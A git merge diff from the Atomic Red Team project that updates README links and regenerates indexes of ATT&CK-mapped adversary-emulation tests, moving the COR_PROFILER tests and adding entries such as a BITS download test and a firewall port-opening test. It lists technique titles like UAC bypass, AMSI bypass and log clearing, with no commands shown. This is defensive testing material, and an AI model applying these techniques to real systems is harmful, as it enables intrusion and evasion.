Merge branch 'master' into patch-33

2020-08-26 12:55:21 -05:00
parent a14952c4b0 04a409832e
commit eb5c8e4916
40 changed files with 1031 additions and 380 deletions
@@ -5,7 +5,7 @@

 Atomic Red Team allows every security team to test their controls by executing simple
 "atomic tests" that exercise the same techniques used by adversaries (all mapped to
-[Mitre's ATT&CK](https://attack.mitre.org/wiki/Main_Page)).
+[Mitre's ATT&CK](https://attack.mitre.org)).

 ## Philosophy

@@ -38,14 +38,14 @@ Join the community on Slack at [https://atomicredteam.slack.com](https://atomicr

 ## Getting Started

-* [Getting Started With Atomic Tests](https://atomicredteam.io/testing)
+* [Getting Started With Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/wiki/About-Atomic-Red-Team)
 * Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks)
-* Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index-by-tactic.md)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md)
+* Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index.csv)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md)
  - Windows [Matrix](atomics/Indexes/Matrices/windows-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/windows-index.md), [csv](atomics/Indexes/Indexes-CSV/windows-index.csv))
  - MacOS [Matrix](atomics/Indexes/Matrices/macos-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/macos-index.md), [csv](atomics/Indexes/Indexes-CSV/macos-index.csv))
  - Linux [Matrix](atomics/Indexes/Matrices/linux-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/linux-index.md), [csv](atomics/Indexes/Indexes-CSV/linux-index.csv))
 * Using [ATT&CK Navigator](https://github.com/mitre-attack/attack-navigator)? Check out our coverage layers ([All](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json), [Windows](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json), [MacOS](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json), [Linux](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json))
-* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://atomicredteam.io/contributing) your own modifications
+* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) your own modifications
 * Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
    * Need a Slack invitation? Grab one at [https://slack.atomicredteam.io/](https://slack.atomicredteam.io/)

@@ -16,10 +16,10 @@ privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fod
 privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
 privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
 privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
+privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
+privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
+privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
-privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijack Leveraging user scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
-privilege-escalation,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
-privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
 privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
@@ -82,6 +82,7 @@ persistence,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,9
 persistence,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
 persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
+persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
@@ -91,14 +92,15 @@ persistence,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-92
 persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
 persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
 persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
+persistence,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
 persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
+persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
+persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
+persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
-persistence,T1546.015,Component Object Model Hijacking,1,COM Hijack Leveraging user scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
-persistence,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
-persistence,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
 persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
@@ -210,6 +212,7 @@ defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#
 defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
 defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
 defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
+defense-evasion,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
 defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
 defense-evasion,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
 defense-evasion,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
@@ -220,6 +223,9 @@ defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Tru
 defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
 defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
+defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
+defense-evasion,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
+defense-evasion,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
 defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
 defense-evasion,T1070.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
@@ -248,6 +254,7 @@ defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable iptables f
 defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
 defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
 defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
@@ -13,10 +13,10 @@ privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fod
 privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
 privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
 privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
+privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
+privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
+privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
-privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijack Leveraging user scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
-privilege-escalation,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
-privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
@@ -56,6 +56,7 @@ defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#
 defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
 defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
 defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
+defense-evasion,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
 defense-evasion,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
 defense-evasion,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
 defense-evasion,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
@@ -65,6 +66,9 @@ defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Tru
 defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
 defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
+defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
+defense-evasion,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
+defense-evasion,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
 defense-evasion,T1070.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
 defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
@@ -81,6 +85,7 @@ defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HT
 defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,9,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,10,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,11,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
@@ -193,6 +198,7 @@ defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1
 defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt
 persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
+persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
@@ -201,14 +207,15 @@ persistence,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-92
 persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
 persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
 persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
+persistence,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
 persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
+persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
+persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
+persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
-persistence,T1546.015,Component Object Model Hijacking,1,COM Hijack Leveraging user scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
-persistence,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
-persistence,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
@@ -31,14 +31,14 @@
  - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
  - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
+  - Atomic Test #1: User scope COR_PROFILER [windows]
+  - Atomic Test #2: System Scope COR_PROFILER [windows]
+  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
  - Atomic Test #1: Change Default File Association [windows]
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
-  - Atomic Test #1: COM Hijack Leveraging user scope COR_PROFILER [windows]
-  - Atomic Test #2: COM Hijack Leveraging System Scope COR_PROFILER [windows]
-  - Atomic Test #3: COM Hijack Leveraging registry-free process scope COR_PROFILER [windows]
+- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
@@ -176,6 +176,7 @@
  - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
  - Atomic Test #1: Admin Account Manipulate [windows]
+  - Atomic Test #2: Domain Account and Group Manipulate [windows]
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1098.001 Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -195,6 +196,7 @@
  - Atomic Test #1: Bitsadmin Download (cmd) [windows]
  - Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
  - Atomic Test #3: Persist, Download, & Execute [windows]
+  - Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows]
 - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -203,16 +205,16 @@
  - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
  - Atomic Test #3: Firefox [linux, windows, macos]
  - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
+  - Atomic Test #1: User scope COR_PROFILER [windows]
+  - Atomic Test #2: System Scope COR_PROFILER [windows]
+  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
  - Atomic Test #1: Change Default File Association [windows]
 - T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
-  - Atomic Test #1: COM Hijack Leveraging user scope COR_PROFILER [windows]
-  - Atomic Test #2: COM Hijack Leveraging System Scope COR_PROFILER [windows]
-  - Atomic Test #3: COM Hijack Leveraging registry-free process scope COR_PROFILER [windows]
+- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -452,6 +454,7 @@
  - Atomic Test #1: Bitsadmin Download (cmd) [windows]
  - Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
  - Atomic Test #3: Persist, Download, & Execute [windows]
+  - Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows]
 - [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
  - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -466,7 +469,10 @@
 - [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
  - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
  - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
+  - Atomic Test #1: User scope COR_PROFILER [windows]
+  - Atomic Test #2: System Scope COR_PROFILER [windows]
+  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
  - Atomic Test #1: Clear Bash history (rm) [linux, macos]
  - Atomic Test #2: Clear Bash history (echo) [linux, macos]
@@ -516,6 +522,7 @@
  - Atomic Test #2: Disable Microsoft Defender Firewall [windows]
  - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
  - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
+  - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
 - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
  - Atomic Test #1: Disable syslog [linux]
  - Atomic Test #2: Disable Cb Response [linux]
@@ -26,13 +26,13 @@
  - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
  - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
+  - Atomic Test #1: User scope COR_PROFILER [windows]
+  - Atomic Test #2: System Scope COR_PROFILER [windows]
+  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
  - Atomic Test #1: Change Default File Association [windows]
- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
-  - Atomic Test #1: COM Hijack Leveraging user scope COR_PROFILER [windows]
-  - Atomic Test #2: COM Hijack Leveraging System Scope COR_PROFILER [windows]
-  - Atomic Test #3: COM Hijack Leveraging registry-free process scope COR_PROFILER [windows]
+- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
@@ -126,6 +126,7 @@
  - Atomic Test #1: Bitsadmin Download (cmd) [windows]
  - Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
  - Atomic Test #3: Persist, Download, & Execute [windows]
+  - Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows]
 - T1027.001 Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md)
@@ -139,7 +140,10 @@
 - [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
  - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
  - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
